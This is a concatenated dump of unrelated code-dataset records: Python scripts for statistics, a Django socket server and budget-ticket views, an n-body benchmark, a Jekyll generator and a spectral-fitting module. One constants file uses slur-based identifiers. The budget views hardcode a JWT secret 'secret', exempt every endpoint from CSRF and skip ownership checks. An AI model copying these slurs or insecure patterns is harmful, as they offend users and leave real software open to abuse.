np.zeros(100)\nVarianceArrival = np.zeros(100)\nfor i in range(100):\n AverageArrival[i]=np.mean(zip(*ArrivalTime)[i])\n VarianceArrival[i] = np.var(zip(*ArrivalTime)[i])\nx = range(100)\n\n\n\n ","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464748354","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nimport socket\nfrom analysis.core import AnalysisCore\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n port = 8888\n analyzer = AnalysisCore()\n # Init\n analysis_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n analysis_server.bind(('127.0.0.1', port))\n analysis_server.listen(1)\n\n print(\"Analysis Server: listening to port {0}\".format(port))\n while True:\n connection, client_addr = analysis_server.accept()\n try:\n raw_message = connection.recv(256)\n print(\"raw message:{0}\".format(raw_message))\n except socket.error:\n print(\"Socket Error\")\n connection.close()\n try:\n message = str(raw_message).decode(\"utf-8\").strip()\n except:\n print(\"Decode Error\")\n connection.send(json.dumps('Error'))\n continue\n if not message:\n connection.send(json.dumps('Error'))\n continue\n if message.lower() == 'ping':\n 
connection.send(json.dumps('Analysis Server listening'))\n continue\n connection.send(analyzer.analysis(message))\n # analyze\n","sub_path":"DjangoCodes/CommentAnalysis/CommentAnalysis/management/commands/startanalysis.py","file_name":"startanalysis.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183241301","text":"ADMINFAG = [\"RealDolos\"]\nPARROTFAG = \"Parrot\"\n\nBLACKFAGS = [i.casefold() for i in (\n \"kalyx\", \"merc\", \"loliq\", \"annoying\", \"bot\", \"RootBeats\", \"JEW2FORU\", \"quag\", \"mire\", \"perici\")]\nOBAMAS = [i.casefold() for i in (\n \"counselor\", \"briseis\", \"apha\", \"bread\", \"ark3\", \"jizzbomb\", \"acid\", \"elkoalemos\", \"tarta\")]\n\nBLACKROOMS = \"e7u-CG\", \"jAzmc3\", \"f66jeG\", \"24_zFd\"\nWHITEROOMS = \"9pdLvy\"\n","sub_path":"volaparrot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"135407366","text":"# Crie um programa que leia duas notas de um aluno e calcule sua\n# média, mostrando uma mensagem no final, de acordo com sua média\n# atingida:\n# Média abaixo de 5.0: REPROVADO\n# Média entre 5.0 e 6.9: RECUPERAÇÂO\n# Média 7.0 ou superior: APROVADO\nn1 = float(input('Digite a primeira nota: '))\nn2 = float(input('Digite a segunda nota: '))\nmedia = (n1 + n2) / 2\nif media < 5.0:\n print('Aluno REPROVADO!')\nelif media == 5.0 or media < 7.0:\n print('Aluno em RECUPERAÇÃO!')\nelif media >= 7.0:\n print('Aluno APROVADO!')\n","sub_path":"mundo-02/exercicio-040.py","file_name":"exercicio-040.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"9004005","text":"#! 
/usr/bin/env python\n\n# Maximum error: 0.0000 -- Total error: 0.0000\n# 10 n-body iterations\n# 3265.094042 ms: 0.001505 GFLOP/s\n\nimport numpy as np\nimport time\nfrom numba import *\n\nflopsPerInteraction = 30\nSOFTENING_SQUARED = 0.01\n\n\ndef normalize (vector):\n dist = np.sqrt((vector * vector).sum())\n if dist > 1e-6:\n vector /= dist\n return dist\n\n\ndef randomize_bodies(pos, vel, cluster_scale, velocity_scale, n):\n np.random.seed(42)\n scale = cluster_scale\n vscale = scale * velocity_scale\n inner = 2.5 * scale\n outer = 4.0 * scale\n\n i = 0\n while i < n:\n point = np.random.random(3) / 2.\n length = normalize(point)\n if length > 1.:\n continue\n pos[i,:3] = point * ((inner + (outer - inner)) * np.random.random(3))\n pos[i,3] = 1.0\n axis = np.array((0., 0., 1.))\n normalize(axis)\n if (1 - ((point * axis).sum())) < 1e-6:\n axis[0] = point[1]\n axis[1] = point[0]\n normalize(axis)\n vv = np.cross(pos[i,:3], axis)\n vel[i,:3] = vscale * vv\n vel[i,3] = 1.0\n #print(\"%d: %s, %s\" % (i, pos[i], vel[i]))\n i += 1\n\n\ndef check_correctness(pin, pout, v, dt, n, integrate_0, integrate_1):\n pin_ref = np.zeros_like(pin)\n pout_ref = np.zeros_like(pout)\n v_ref = np.zeros_like(v)\n randomize_bodies(pin_ref, v_ref, 1.54, 8.0, n)\n integrate_0(pout_ref, pin, np.copy(v), dt, n)\n integrate_1(pout, pin, np.copy(v), dt, n)\n \n errt = 0\n errmax = 0\n\n errs = np.fabs(pout_ref - pout).reshape(4 * n)\n errt = errs.sum()\n errmax = errs.max()\n\n print(\"Maximum error: %0.4f -- Total error: %0.4f\" % (errmax, errt))\n\ndef check_overflow(x):\n return np.isnan(np.sum(x)) \n\ndef body_body_interaction(force, pos_mass0, pos_mass1):\n r = pos_mass1[:3] - pos_mass0[:3]\n dist_sqr = (r * r).sum()\n dist_sqr += SOFTENING_SQUARED\n inv_dist = 1.0 / np.sqrt(dist_sqr)\n inv_dist_cube = inv_dist * inv_dist * inv_dist\n s = pos_mass1[3] * inv_dist_cube\n force += r * s\n\ndef integrate(position_out, position_in, velocity, delta_time, n):\n for i in range(n):\n p = position_in[i]\n f = np.zeros(3)\n for j in range(n):\n body_body_interaction(f, p, position_in[j])\n inv_mass = velocity[i,3]\n v = velocity[i,:3] + f * inv_mass * delta_time\n position_out[i,:3] = p[:3] + v * delta_time\n position_out[i,3] = position_in[i,3]\n velocity[i,:3] = v\n\ndef compute_perf_stats(milliseconds, iterations, n):\n interactionsPerSecond = float(n * n)\n interactionsPerSecond *= 1e-9 * iterations * 1000 / milliseconds\n return interactionsPerSecond * flopsPerInteraction;\n\n\ndef main(*args):\n n = 128\n iterations = 10\n dt = 0.01667\n\n if len(args) > 0:\n n = int(args[0])\n if len(args) > 1:\n iterations = int(args[1])\n\n pin = np.zeros((n, 4))\n pout = np.zeros((n, 4))\n v = np.zeros((n, 4))\n\n randomize_bodies(pin, v, 1.54, 8.0, n)\n\n check_correctness(pin, pout, v, dt, n, integrate, integrate)\n\n time0 = time.time()\n for i in range(iterations):\n integrate(pout, pin, v, dt, n)\n pin, pout = pout, pin\n time1 = time.time()\n ms = (time1 - time0)*1000\n gf = compute_perf_stats(ms, iterations, n)\n\n print(\"%d n-body iterations\" % iterations)\n print(\"%f ms: %f GFLOP/s\" % (ms, gf))\n\n\nif __name__ == \"__main__\":\n import sys\n main(*sys.argv[1:])\n","sub_path":"legacy/nbody/nbody_modified_by_MarkHarris.py","file_name":"nbody_modified_by_MarkHarris.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"396830186","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import metrics\nfrom 
sklearn.naive_bayes import GaussianNB\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.feature_extraction import DictVectorizer as dv\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import linear_model\n\nfeature = [\"ct_dst_sport_ltm\"]\n\nraw_train_data = pd.read_csv(\"unsw/UNSW_NB15_training-set.csv\", delimiter=',', encoding=\"utf-8-sig\")\nraw_test_data = pd.read_csv(\"unsw/UNSW_NB15_testing-set.csv\", delimiter=',', encoding=\"utf-8-sig\")\n\ntrain_data = pd.DataFrame(index = raw_train_data.index, columns = feature)\ntest_data = pd.DataFrame(index = raw_test_data.index, columns = feature)\n\nfor item in feature:\n\ttrain_data[item] = raw_train_data[item]\n\ttest_data[item] = raw_test_data[item]\n\ntrain_target = raw_train_data['label']\ntest_target = raw_test_data['label']\n\nfeature_train_data = train_data.as_matrix()\nfeature_train_target = train_target.as_matrix()\n\nfeature_test_data = test_data.as_matrix()\nfeature_test_target = test_target.as_matrix()\n\n# NaiveBayes\nmodel = GaussianNB()\nmodel.fit(feature_train_data, feature_train_target)\nprint(model)\n\nexpected = feature_test_target\npredicted = model.predict(feature_test_data)\n\nprint(\"NaiveBayes GaussianNB\")\nprint(metrics.classification_report(expected, predicted))\nprint(metrics.confusion_matrix(expected, predicted))\n\n","sub_path":"train_test_rule.py","file_name":"train_test_rule.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
{"seq_id":"43720644","text":"def main():\n outfile = open(\"best.txt\",\"w\")\n print (\"Five Hardest Working Students...\")\n print()\n\n print(\"Please enter the name of\")\n for i in range(5):\n name = input((\"Student {0:}:\").format(i+1))\n print(name, file = outfile)\n\n outfile.close()\n\n\n\nmain()\n\n \n \n","sub_path":"Ch 5 Quiz/Question 16.py","file_name":"Question 16.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
{"seq_id":"529214845","text":"from django import template\nfrom django.utils.html import format_html, format_html_join\n\nfrom django.urls import reverse\n\nfrom notifications.templatetags import notifications_tags\n\nregister = template.Library()\n\n\n@register.filter\ndef render_field_from_string(form, s):\n if s in form.fields:\n return form[s].as_widget()\n return \"\"\n\n@register.filter\ndef render_field_from_int(form, n):\n if str(n) in form.fields:\n return form[str(n)].as_widget()\n return \"\"\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n@register.filter\ndef model_name(model):\n return getattr(model, '__name__',\n model.__class__.__name__)\n # return model.__name__\n\n@register.inclusion_tag('smart_link.html')\ndef smart_link(linked_url, link_text, request):\n return locals()\n\n@register.simple_tag(takes_context=True)\ndef live_notifications_smartlink(context, badge_class='live_notifications_smartlink'):\n user = notifications_tags.user_context(context)\n if not user:\n return ''\n html = \"<span class='{badge_class}'>notifications ({unread})</span>\".format(\n badge_class=badge_class,\n unread=user.notifications.unread().count(),\n )\n if 'notifications' not in context['request'].path:\n html = \"<a href='{link_url}'>{html}</a>\".format(\n link_url=reverse('notifications'),\n html=html\n )\n html = \"<li>{html}</li>\".format(html=html)\n return format_html(html)\n\n# @register.inclusion_tag('notifications_badge.html')\n# def smart_link(linked_url, link_text, request):\n# link_text = f'notifications ({})'\n# return locals()\n\n\n\n# @register.filter\n# def modelname(model):\n# return model.__name__\n\n# def display_user(user):\n# display = f'{user.username}'\n# return format_html(\"<a href='mailto:{}'>{}</a>\",\n# user.email, user.username)\n\n# @register.simple_tag\n# def user(user):\n# return display_user(user)\n\n# @register.filter\n# def display_user_list(ul):\n# return format_html_join(\n# ', ',\n# '<a href=\"mailto:{}\">{}</a>',\n# ((u.email, u.username) for u in ul)\n# )\n\n","sub_path":"main/templatetags/main_tags.py","file_name":"main_tags.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"584881701","text":"#!/usr/bin/env python\n\n# Copyright 2016 Netherlands eScience Center\n#\n# Licensed under the Apache License, Version 2.0 (the 'License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport argparse\nfrom datetime import datetime\nimport logging\nfrom os import mkdir\nfrom os.path import isfile\nfrom string import Template\nimport urllib2\n\nimport github3\nimport yaml\n\n\ndef generate_config(organization, configfn):\n gh = github3.GitHub()\n org = gh.organization(organization)\n\n config = {\n 'title': org.name,\n 'slug': org.login,\n 'description': org._json_data['description'],\n 'baseurl': '',\n 'created_at': org.created_at,\n 'urls': {\n 'avatar': org.avatar_url,\n 'organization': org.html_url,\n 'project': org.blog,\n },\n 'partners': [{\n 'logo_url': 'https://www.esciencecenter.nl/img/pressroom/ESCIENCE_logo_C_nl_cyanblack.jpg',\n 'url': 'https://www.esciencecenter.nl'\n }, {\n 'logo_url': '',\n 'url': ''\n }],\n 'markdown': 'kramdown',\n 'excludes': [\n 'README.md',\n 'utils',\n ],\n 'keep_files': [\n 'assets',\n ''\n ],\n 'collections': {\n 'repos': {\n 'output': False\n },\n 'team_members': {\n 'output': True,\n 'permalink': '/team/:path'\n }\n },\n 'defaults': [{\n 'scope': {\n 'path': '',\n 'type': 'posts'\n },\n 'values': {\n 'layout': 'post'\n },\n 'scope': {\n 'path': '',\n 'type': 'team_members'\n },\n 'values': {\n 'layout': 'team'\n }\n }]\n }\n\n yaml.dump(config, configfn, default_flow_style=False)\n\n\ndef generate_repo(repo, repo_fn):\n repo_tpl = Template('''---\ntitle: $title\nlanguage: $language\nlicense: $license\nhomepage: $homepage\ngithub: $github_url\n---\n$description\n ''')\n config = {\n 'title': repo.name,\n 'description': repo.description,\n 'language': repo.language,\n 'license': repo.license().license['name'],\n 'homepage': repo.homepage or repo.html_url,\n 'github_url': repo.html_url,\n }\n if not repo.homepage:\n logging.warning('{} has no homepage, falling back to github repo'.format(repo.name))\n repo = repo_tpl.substitute(config)\n\n with open(repo_fn, 'w') as repo_markdown_file:\n print(repo, file=repo_markdown_file)\n\n\ndef generate_repos(organization):\n gh = github3.GitHub()\n org = 
    gh = github3.GitHub()\n    org = gh.organization(organization)\n\n    repos_dir = '_repos'\n    try:\n        mkdir(repos_dir)\n    except OSError:\n        pass\n\n    for repo in org.repositories('public'):\n        if repo.name.endswith('github.io'):\n            # skip self\n            continue\n        repo_fn = '{}/{}.md'.format(repos_dir, repo.name)\n        if isfile(repo_fn):\n            # Don't overwrite\n            continue\n        generate_repo(repo, repo_fn)\n\n\ndef generate_publication(doi, style):\n    logging.warning('Fetching metadata for {}'.format(repr(doi)))\n    url = 'http://dx.doi.org/' + doi\n    opener = urllib2.build_opener()\n    opener.addheaders = [('Accept', 'text/bibliography; style={}'.format(style))]\n    try:\n        response = opener.open(url)\n\n        publication = response.read()\n
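        # Wrap the plain-text citation in a list item; generate_publications writes the surrounding <ul> and </ul>.\n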
        publication_html = '<li>{}</li>'.format(publication)\n
        if doi in publication_html:\n            if url in publication_html:\n                publication_html = publication_html.replace(url, '<a href=\"{}\">{}</a>'.format(url, url))\n            else:\n                publication_html = publication_html.replace(doi, '<a href=\"{}\">{}</a>'.format(url, doi))\n        return publication_html\n    except urllib2.HTTPError:\n        logging.warning('Unable to fetch publication for {}, skipping'.format(doi))\n        return ''\n\n\ndef generate_publications(style, dois_fn, publications_fn):\n    dois = yaml.load(dois_fn)\n\n
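    # Each DOI is resolved through dx.doi.org content negotiation into one formatted citation (see generate_publication above).\n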

    header = '''\n    <h2>Publications</h2>\n    <!-- generated {now} -->\n    <ul>\n    '''.format(now=datetime.now())\n\n    print(header, file=publications_fn)\n\n    if dois is not None:\n        for doi in dois:\n            publication = generate_publication(doi, style)\n            print(publication, file=publications_fn)\n\n
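    # Close the list opened in the header.\n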
    print('</ul>', file=publications_fn)\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Generate Jekyll files')\n    subparsers = parser.add_subparsers()\n\n    config_parser = subparsers.add_parser('config', help='Generate Jekyll _config.yml file')\n    config_parser.add_argument('organization', help='Github organization or user name')\n    config_parser.add_argument('configfn',\n                               default='_config.yml',\n                               type=argparse.FileType('w'),\n                               help=\"Filename for config file. Default _config.yml. Use - for stdout\")\n    config_parser.set_defaults(func=generate_config)\n\n    repos_parser = subparsers.add_parser('repos', help='Generate markdown file for organization repos')\n    repos_parser.add_argument('organization', help='Github organization or user name')\n    repos_parser.set_defaults(func=generate_repos)\n\n    publ_parser = subparsers.add_parser('publications', help='Generates publications html file')\n    publ_parser.add_argument('dois_fn',\n                             type=argparse.FileType('r'),\n                             default='_data/dois.yml',\n                             nargs='?',\n                             help='Filename of dois yaml file')\n    publ_parser.add_argument('publications_fn',\n                             type=argparse.FileType('w'),\n                             default='_includes/publications.html',\n                             nargs='?',\n                             help='Filename of publications html file')\n    publ_parser.add_argument('--style',\n                             default='apa',\n                             help='Style of citation, see http://api.crossref.org/styles for supported styles, default is apa')\n    publ_parser.set_defaults(func=generate_publications)\n\n    args = parser.parse_args()\n    fargs = vars(args)\n    if 'func' in args:\n        func = args.func\n        del fargs['func']\n        func(**fargs)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"utils/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"385568402","text":"YEAR = (2, 'year')\nMONTH = (3, 'month')\nDAY = (4, 'day')\nHOUR = (5, 'hour')\nDIRECTION_COLUMN = (23, 'wind_direction')\nVELOCITY_COLUMN = (25, 'wind_velocity')\nGUST_COLUMN = (27, 'wind_gust')\nTEMPERATURE = (29, 'temperature')\nPRESSURE = (41, 'pressure')\nCURRENT_WEATHER = (52, 'current_weather')","sub_path":"src/wind_forecast/preprocess/synop/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599590674","text":"from django.conf.urls.defaults import *\n\nurlpatterns = patterns(\n    'wizards_duel.duel.views',\n    (r'^$', 'duel_index'),\n    (r'create/$', 'duel_index'),\n    (r'^(?P<duel_id>\\d+)/$', 'duel_detail'),\n    (r'^(?P<duel_id>\\d+)/join/avatar/(?P<avatar_id>\\d+)/$', 'join'),\n    (r'^(?P<duel_id>\\d+)/avatar/(?P<avatar_id>\\d+)/(?P<action>\\w+)/', 'add_action'),\n)\n\n\n","sub_path":"duel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"291844538","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom .models import TicketApprov, TicketApprovItem, Approv, Product, LigneBudget, PosteBudget\nfrom django.db.models import F\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nimport jwt\nfrom datetime import datetime, timedelta\nfrom django.core.mail import send_mail\nfrom .views import tokenVerification\n\nJWT_SECRET = 'secret'\nJWT_ALGORITHM = 'HS256'\nJWT_EXP_DELTA_SECONDS = 50000\n\n\ndef sumAmount(param):\n    b = 0\n    for item in param:\n        b = b + item['amount']\n        #b=b+item\n    return b\n\n\n@csrf_exempt\ndef newPoste(request):\n    req = request.body\n    my_json = 
req.decode('utf8').replace(\"'\", '\"')\n my_json = json.loads(my_json)\n poste = PosteBudget.objects.create(name = my_json['name'], type = my_json['type'], year = my_json['year'])\n for item in my_json['ligne']:\n LigneBudget.objects.create(name = item['name'], amount = item['amount'], posteBudget = poste)\n return JsonResponse({})\n\n\n@csrf_exempt\ndef editPoste(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n my_json = json.loads(my_json)\n print(my_json)\n poste = PosteBudget.objects.get(pk = my_json['id'])\n LigneBudget.objects.filter(posteBudget=my_json['id']).delete()\n for item in my_json['ligne']:\n LigneBudget.objects.create(name = item['name'], amount = item['amount'], posteBudget = poste)\n return JsonResponse({})\n\n\n@csrf_exempt\ndef listePosteFonctionnement(request):\n poste=[]\n for pst in PosteBudget.objects.filter(type=\"fonctionnement\"):\n ligne = [elt.serializable() for elt in LigneBudget.objects.filter(posteBudget__id=pst.pk)]\n poste.append({\n \"id\": pst.pk,\n \"name\": pst.name,\n \"type\": pst.type,\n \"year\": pst.year,\n \"amount\": sumAmount(ligne)\n })\n #return JsonResponse([poste.serializable() for poste in PosteBudget.objects.filter(type=\"fonctionnement\")], safe=False)\n return JsonResponse(poste, safe=False)\n\n\n@csrf_exempt\ndef listePosteInvestissement(request):\n poste=[]\n for pst in PosteBudget.objects.filter(type=\"investissement\"):\n ligne = [elt.serializable() for elt in LigneBudget.objects.filter(posteBudget__id=pst.pk)]\n poste.append({\n \"id\": pst.pk,\n \"name\": pst.name,\n \"type\": pst.type,\n \"year\": pst.year,\n \"amount\": sumAmount(ligne)\n })\n #return JsonResponse([poste.serializable() for poste in PosteBudget.objects.filter(type=\"investissement\")], safe=False)\n return JsonResponse(poste, safe=False)\n\n\n@csrf_exempt\ndef listeLigneFonctionnement(request):\n return JsonResponse([poste.serializable() for poste in LigneBudget.objects.filter(posteBudget__type=\"fonctionnement\")], safe=False)\n\n\n@csrf_exempt\ndef listeLigneInvestissement(request):\n return JsonResponse([ligne.serializable() for ligne in LigneBudget.objects.filter(posteBudget__type=\"investissement\")], safe=False)\n\n\n\n@csrf_exempt\ndef approvStats(request):\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n allApprov = Approv.objects.filter(user__id = payload['user_id']).count()\n successApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=1, infoDecision=1).count()\n rejectApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=2).filter(user__id = payload['user_id'], infoDecision=2).count()\n cancelApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=3).filter(user__id = payload['user_id'], infoDecision=3).count()\n waitingApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=1, infoDecision=0).count() + Approv.objects.filter(user__id = payload['user_id'], higherDecision=0, infoDecision=1).count() + Approv.objects.filter(user__id = payload['user_id'], higherDecision=0, infoDecision=0).count()\n print(allApprov)\n return JsonResponse({\"all\": allApprov, \"success\": successApprov, \"reject\": rejectApprov, \"cancel\": cancelApprov, \"waiting\": waitingApprov})\n\n\n@csrf_exempt\ndef decisionTicketApprov(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n data=json.loads(my_json)\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n 
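# Record the user's decision and message; on acceptance (decision == 1), deduct the shipped quantities from stock.\n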
    TicketApprov.objects.filter(id=data[\"id\"]).update(userDecision=data[\"decision\"], message=data[\"message\"])\n    if data[\"decision\"] == 1:\n        for item in TicketApprovItem.objects.filter(ticketapprov=data['id']):\n            Product.objects.filter(name=item.product).update(quantity=F('quantity')-item.sendquantity)\n    return JsonResponse({\"message\": \"well done\"})\n\n\n@csrf_exempt\ndef sendingMail(receiver, name):\n    subject = \"Ticket approvision\"\n    message = \"Bonjour monsieur {name}, veuillez confirmer la réception du matériel reçu\".format(name=name)\n    send_mail(subject, message, 'jerarlmalim@gmail.com', [receiver], fail_silently=False)\n\n\n@csrf_exempt\ndef listTicketApprovs(request):\n    payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n    ticketApprovs = TicketApprov.objects.all()\n    return JsonResponse([ticket.serializable() for ticket in ticketApprovs], safe=False)\n\n\n@csrf_exempt\ndef listPersonnalTicketApprovs(request):\n    payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n    ticketApprovs = TicketApprov.objects.filter(approv__user__id=payload['user_id'])\n    return JsonResponse([ticket.serializable() for ticket in ticketApprovs], safe=False)\n\n\n\n@csrf_exempt\ndef listTicketApprovsItem(request):\n    payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n    ticketApprovsItem = TicketApprovItem.objects.all()\n    return JsonResponse([ticket.serializable() for ticket in ticketApprovsItem], safe=False)\n\n\n@csrf_exempt\ndef addTicketApprovs(request):\n    req = request.body\n    my_json = req.decode('utf8').replace(\"'\", '\"')\n    my_json = my_json.replace(\",{\", \";{\")\n    my_json = my_json.replace(\"[\", \"\")\n    my_json = my_json.replace(\"]\", \"\")\n    app = my_json.split(\";\")\n    payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n    ticketApprov = TicketApprov.objects.create(approv=Approv.objects.get(id=(json.loads(app[0]))[\"approv\"]), message=\"\")\n    ticketApprov.save()\n    for item in app:\n        item = json.loads(item)\n        if (item['send'] > Product.objects.get(name=item['product']).waitingquantity):\n            return JsonResponse({'message': 'Le ticket ne peut être créé car certains produits ne sont pas suffisants en stock'})\n        else:\n            TicketApprovItem.objects.create(product=item['product'], sendquantity=item['send'], initialquantity=item['quantity'], ticketapprov=ticketApprov)\n            Product.objects.filter(name=item['product']).update(waitingquantity=F('waitingquantity')-item['send'])\n    data = Approv.objects.get(id=(json.loads(app[0]))[\"approv\"])\n    sendingMail(data.user.email, data.user.name)\n    return JsonResponse({})\n\n\n@csrf_exempt\ndef modifTicketApprov(request):\n    req = request.body\n    my_json = req.decode('utf8').replace(\"'\", '\"')\n    my_json = my_json.replace(\",{\", \";{\")\n    my_json = my_json.replace(\"[\", \"\")\n    my_json = my_json.replace(\"]\", \"\")\n    app = my_json.split(\";\")\n    payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n    ticketApprov = TicketApprov.objects.get(id=(json.loads(app[0]))['ticketapprov'])\n    for item in app:\n        item = json.loads(item)\n        Product.objects.filter(name=item['product']).update(waitingquantity=F('waitingquantity') + TicketApprovItem.objects.filter(ticketapprov=item['ticketapprov'], product=item['product'])[0].sendquantity)\n        Product.objects.filter(name=item['product']).update(waitingquantity=F('waitingquantity') - item['sendquantity'])\n
        TicketApprovItem.objects.filter(ticketapprov=item['ticketapprov'], product=item['product']).update(sendquantity=item['sendquantity'])\n    return JsonResponse({\"message\": \"well done\"})\n\n\n@csrf_exempt\ndef deleteTicketApprov(request):\n    req = request.body\n    payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n    my_json = req.decode('utf8')\n    data = json.loads(my_json)\n    TicketApprov.objects.get(id=data['id']).delete()\n    return JsonResponse({\"message\": \"well done\"})\n\n\n\n\n\n\n","sub_path":"suivi_budgetaire/stock/ticket_approv.py","file_name":"ticket_approv.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"444839925","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#######################################################################\n###\n### params format (each entry a list): [restwave,coldens,bval,z,vel]\n### restwave (of an actual line), column density, bval - width of Gaussian, z (bulk), velocity (relative to z)\n### e.g. [1215.6701, 14.5, 30., 0.1, 0.] is an HI Lya component with logN = 14.5 and b = 30 km/s at z = 0.1\n###\n#######################################################################\n\nfrom __future__ import print_function, absolute_import, division, unicode_literals\n\nfrom PyQt5 import QtGui, QtCore\n\nfrom joebvp import joebgoodies as jbg\nimport numpy as np\nfrom scipy.signal import convolve\nfrom scipy.special import wofz\nfrom scipy.optimize import least_squares\nimport scipy.stats\nfrom joebvp.atomicdata import atomicdata\nfrom astropy import constants as const\nimport sys, os\nimport warnings\ntry:\n    import joebvp_cfg as cfg\nexcept:\n    print(\n        \"joebvp.makevoigt: No local joebvp_cfg.py found, using default cfg.py file from joebvp.\"\n    )\n    from joebvp import cfg\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\nimport astropy.units as u\nfrom astropy.io import ascii\nfrom astropy.table import Table\nfrom linetools import utils as ltu\nfrom linetools.spectra.lsf import LSF\nimport pandas as pd\nfrom glob import glob\nfrom joebvp import VPmeasure\nfrom joebvp import makevoigt\nfrom joebvp import nmpfit\n\nln2 = np.log(2)\nc = const.c.to('km/s').value\n\nfrom linetools.spectra.xspectrum1d import XSpectrum1D\n\nfrom scipy.optimize import leastsq\n\n# directly lifted from joebvpfit:\n\n\ndef foldpars(pars, numpars=5):\n    rows = len(pars) // numpars\n    fpars = []\n    for i in np.arange(numpars, dtype='int'):\n        fparrow = []\n        for j in np.arange(rows, dtype='int'):\n            fparrow.append(pars[i + numpars * j])\n        fpars.append(fparrow)\n    return fpars\n\n\ndef unfoldpars(pars, numpars=5):\n    rows = len(pars[0])\n    ufpars = []\n    for j in range(rows):\n        for i in np.arange(numpars, dtype='int'):\n            ufpars.append(pars[i][j])\n    return ufpars\n\n\ndef voigtfunc(vwave, vpars):\n    ### Check to see if cfg variables are set\n    if isinstance(cfg.fitidx, int) | isinstance(cfg.wave, int):\n        cfg.fitidx = fitpix(vwave, vpars)\n        cfg.wave = vwave\n    if len(cfg.lsfs) == 0:\n        makevoigt.get_lsfs()\n\n    vflux = np.zeros(len(vwave)) + 1.\n    ### redo voigt function w/ numpy?\n    factor = makevoigt.voigt(vwave, vpars[0], vpars[1], vpars[2], vpars[3],\n                             vpars[4])\n    convfactor = makevoigt.convolvecos(vwave, factor, vpars[0], vpars[3])\n    vflux *= convfactor\n\n    return vflux\n\n\ndef readpars(filename, wave1=None, wave2=None):\n    '''\n\n    Parameters\n    ----------\n    filename : str\n        Name of parameter input (or joebvp output) file\n        File should at least have following columns:\n        specfile|restwave|zsys|col|sigcol|bval|sigbval|vel|sigvel|nflag|bflag|vflag|vlim1|vlim2\n    wave1 : float, optional\n        Beginning of wavelength range over which to load lines (must be set with wave2)\n    
wave2 : float, optional\n        End of wavelength range over which to load lines (must be set with wave1)\n\n    Returns\n    -------\n    fitpars : list of lists\n        Parameters for fit ready for fitter!\n    fiterrors : array of numpy vectors\n        Error array for the fitting initialized to '0' for each param\n    parinfo : array of arrays\n        Flags to be used in fit\n    linecmts: list of lists\n        Reliability and comment flags, e.g., from igmguesses\n    '''\n    linelist = ascii.read(filename)\n    linerestwave = linelist['restwave'].data\n    linez = linelist['zsys'].data\n    if (wave1 is None) and (wave2 is None):\n        lineshere = np.arange(len(linelist))\n    elif (wave1 is None) or (wave2 is None) or (wave1 >= wave2):\n        lineshere = np.arange(len(linelist))\n        warnings.warn(\n            'Note that both \\'wave1\\' and \\'wave2\\' must be declared or neither must be. \\n Loading all lines in list.'\n        )\n    else:\n        lineobswave = linerestwave * (1. + linez)\n        lineshere = np.where((lineobswave > wave1) & (lineobswave < 